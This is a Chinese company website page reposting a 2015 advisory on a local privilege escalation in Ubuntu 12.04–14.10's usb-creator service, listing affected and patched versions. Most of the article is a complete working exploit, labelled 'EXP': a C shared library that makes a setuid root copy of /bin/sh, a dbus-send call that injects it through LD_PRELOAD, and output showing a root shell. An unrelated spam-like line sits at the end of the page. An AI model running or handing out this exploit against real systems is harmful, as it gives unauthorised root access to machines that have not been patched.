联系我们
  • 公司地址:广东省惠州市惠城区东平半岛惠州大道20号赛格大厦1608号

    联系电话:0752-2072178
    传真:0752-2072168-0 
    邮箱:gdoudi@ouditech.com


Ubuntu曝本地权限提升漏洞,影响12.04 – 14.10版本(含EXP)
2015-4-27
来源:未知
点击数: 1676          作者:未知
  • 今天Ubuntu12.04-14.10曝出本地权限提升漏洞,该漏洞由Google的大神Tavis Ormandy发出,包含漏洞利用测试程序。

    漏洞等级:

    高危

    影响范围

    Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu (Patched in: 0.2.38.3ubuntu0.1)
    Ubuntu Trusty (14.04LTS) <= usb-creator 0.2.56.3ubuntu (Patched in: 0.2.56.3ubuntu0.1)
    Ubuntu Utopic (14.10) <= usb-creator 0.2.62ubuntu0.2 (Patched in: 0.2.62ubuntu0.3)

    漏洞测试EXP

    $ cat > test.c
    void __attribute__((constructor)) init (void)
    {
    chown("/tmp/test", 0, 0);
    chmod("/tmp/test", 04755);
    }
    ^D
    $ gcc -shared -fPIC -o /tmp/test.so test.c
    $ cp /bin/sh /tmp/test
    $ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
    method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
    $ ls -l /tmp/test
    -rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
    $ /tmp/test
    # id
    euid=0(root) groups=0(root)
热门评论
  • 暂无信息

验证码: 验证码,看不清楚?请点击刷新验证码

地址:广东省惠州市惠城区东平半岛惠州大道20号赛格大厦1608号

电话:0752-2072178  传真:0752-2072168-0  邮箱:gdoudi@ouditech.com广东欧迪科技有限公司 版权所有

Copyright ©2020 Guangdong Oudi Technology Corporation All Rights Reserved.

粤ICP备16018732号-1

春夜影院试看2分钟